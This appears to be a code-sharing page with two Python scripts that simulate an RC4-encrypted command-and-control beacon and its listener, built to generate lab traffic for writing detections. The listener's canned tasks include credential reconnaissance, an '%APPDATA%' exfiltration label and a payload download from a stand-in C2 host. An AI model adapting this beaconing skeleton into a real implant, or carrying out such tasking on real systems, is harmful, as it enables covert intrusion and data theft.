Last active
November 21, 2025 15:25
rc4 encryption
| import socket | |
| import time | |
| import random | |
| import string | |
| from arc4 import ARC4 | |
# Configuration
# Every value below is a hard-coded lab fixture for a traffic simulator; the
# endpoint and key are shared verbatim with the listener script on this page.
# 172.31.255.29 sits in the RFC 1918 private range 172.16.0.0/12.
C2_SERVER = ('172.31.255.29', 443) # Change to your lab C2 IP
# Static RC4 key embedded in source: anyone holding this file can decrypt a
# capture of the simulated traffic, which is what a detection lab wants.
KEY = b'APT38SecretKey2025!'
BEACON_INTERVAL = 30 # seconds between beacons (average)
JITTER = 0.4 # +/- 40% jitter
# Size bounds passed to random_payload() for the filler appended to each beacon.
MIN_PAYLOAD = 200 # bytes
MAX_PAYLOAD = 8192 # bytes (simulates file exfil, screenshots, etc.)
def random_payload(min_size, max_size):
    """Return random filler bytes drawn from a base64-looking alphabet.

    The length is picked uniformly from ``min_size``..``max_size`` (both
    inclusive).  The bytes carry no real data: they only pad a simulated
    beacon so that its size varies on the wire.  ``random`` (not ``secrets``)
    is used because nothing here is a secret.
    """
    length = random.randint(min_size, max_size)
    alphabet = string.ascii_letters + string.digits + '/+'
    filler = random.choices(alphabet, k=length)
    return ''.join(filler).encode()
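# Simulated beacon loop: connect, send one RC4-encrypted beacon, read one
# reply, print it, then sleep for a jittered interval.  Replies are only
# decrypted and printed; nothing received is interpreted or executed.
#
# NOTE(review): RC4 with a static key and no per-message nonce restarts the
# same keystream on every connection and in both directions.  Because each
# beacon starts with the constant text "BEACON|", its leading ciphertext
# bytes are identical from beacon to beacon, which gives a stable value to
# key network detections on.  This is suitable for generating lab traffic
# only and offers no real confidentiality.
while True:
    try:
        # The context manager closes the socket on every path; previously a
        # failed connect/send/recv skipped s.close() and leaked the descriptor.
        with socket.socket() as s:
            s.settimeout(10)
            s.connect(C2_SERVER)

            # Outbound beacon / staged exfil
            data_out = f"BEACON|{socket.gethostname()}|DOMAIN.LOCAL|{random.randint(1000,9999)}|" + ''.join(random.choices(string.printable, k=random.randint(50,500)))

            # Fresh cipher state per connection.  The listener decrypts each
            # connection with a new ARC4(KEY), so a single long-lived
            # instance here left every beacon after the first undecryptable.
            arc4 = ARC4(KEY)
            encrypted_out = arc4.encrypt(data_out.encode() + random_payload(MIN_PAYLOAD, MAX_PAYLOAD))

            # sendall() retries until the whole buffer is written; send() may
            # stop after a partial write.
            s.sendall(encrypted_out)

            # Receive and decrypt tasking (server may send large payload).
            # A single recv() returns at most what is buffered, so a large
            # reply can be truncated; only the first 200 bytes are shown.
            response = s.recv(65535)
            if response:
                decrypted = ARC4(KEY).decrypt(response) # New ARC4 instance per-stream (correct RC4 behavior)
                print(f"[+] Received {len(response)} bytes → {decrypted[:200]}...")
    except Exception as e:
        # Best effort: report the failure and retry on the next interval.
        print(f"[-] Connection failed: {e}")

    # Jittered sleep: uniform in BEACON_INTERVAL * [1 - JITTER, 1 + JITTER]
    sleep_time = BEACON_INTERVAL * random.uniform(1 - JITTER, 1 + JITTER)
    time.sleep(sleep_time)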
| import socket | |
| import random | |
| import time | |
| from arc4 import ARC4 # ← THIS WAS MISSING | |
# Lab fixtures: the key and address must match the beacon script's KEY and
# C2_SERVER.  The key is hard-coded on purpose so captured traffic can be
# decrypted during analysis; it provides no real secrecy.
KEY = b'APT38SecretKey2025!'
SERVER_IP = '172.31.255.29'
PORT = 443
# Canned "tasking" labels.  In this script they are only encrypted and sent
# back as bytes; nothing on this page parses or executes them.
tasks = [
    b"TASK: Run whoami /all",
    b"TASK: Screenshot",
    b"TASK: Exfil %APPDATA%\\*",
    b"TASK: Download http://c2.domain/payload.dll",
    b"IDLE",
]
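# Listener half of the simulator: accept one connection at a time, decrypt
# and print the beacon, answer with a canned task label plus random filler.
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Binds to one specific interface address, not 0.0.0.0.
s.bind((SERVER_IP, PORT))
s.listen(50)
print(f"[*] High-volume RC4 C2 listening on {SERVER_IP}:{PORT}")

# NOTE(review): both directions are encrypted with a fresh ARC4(KEY), so the
# request and the reply on a connection share one keystream, and the fixed
# reply prefixes ("TASK: ", "IDLE") are known plaintext.  That is acceptable
# for producing lab traffic to write detections against, and nothing more.
while True:
    try:
        client, addr = s.accept()
        # `with` closes the client socket on every path, including errors;
        # previously an exception in recv/send skipped client.close().
        with client:
            # The loop is single-threaded: without a timeout one silent peer
            # would block every later connection indefinitely.
            client.settimeout(10)
            print(f"[+] Implant connected from {addr[0]}")

            data = client.recv(65535)
            if not data:
                continue

            decrypted = ARC4(KEY).decrypt(data)
            print(f"[+] Decrypted ({len(data)} bytes): {decrypted[:200]}...")

            # Simulate occasional large downlink (payloads, updates, etc.)
            task = random.choice(tasks)
            if random.random() < 0.15: # 15% chance of large payload
                fake_payload = random.randbytes(random.randint(50000, 300000)) # 50–300 KB
                response = task + b'||PAYLOAD||' + fake_payload
            else:
                response = task + random.randbytes(random.randint(100, 2000))

            encrypted_response = ARC4(KEY).encrypt(response)
            # sendall() writes the whole buffer; send() can return after a
            # partial write, which matters for the 50-300 KB replies.
            client.sendall(encrypted_response)
    except Exception as e:
        # Best effort: log the failure and keep serving.
        print(f"[-] Error: {e}")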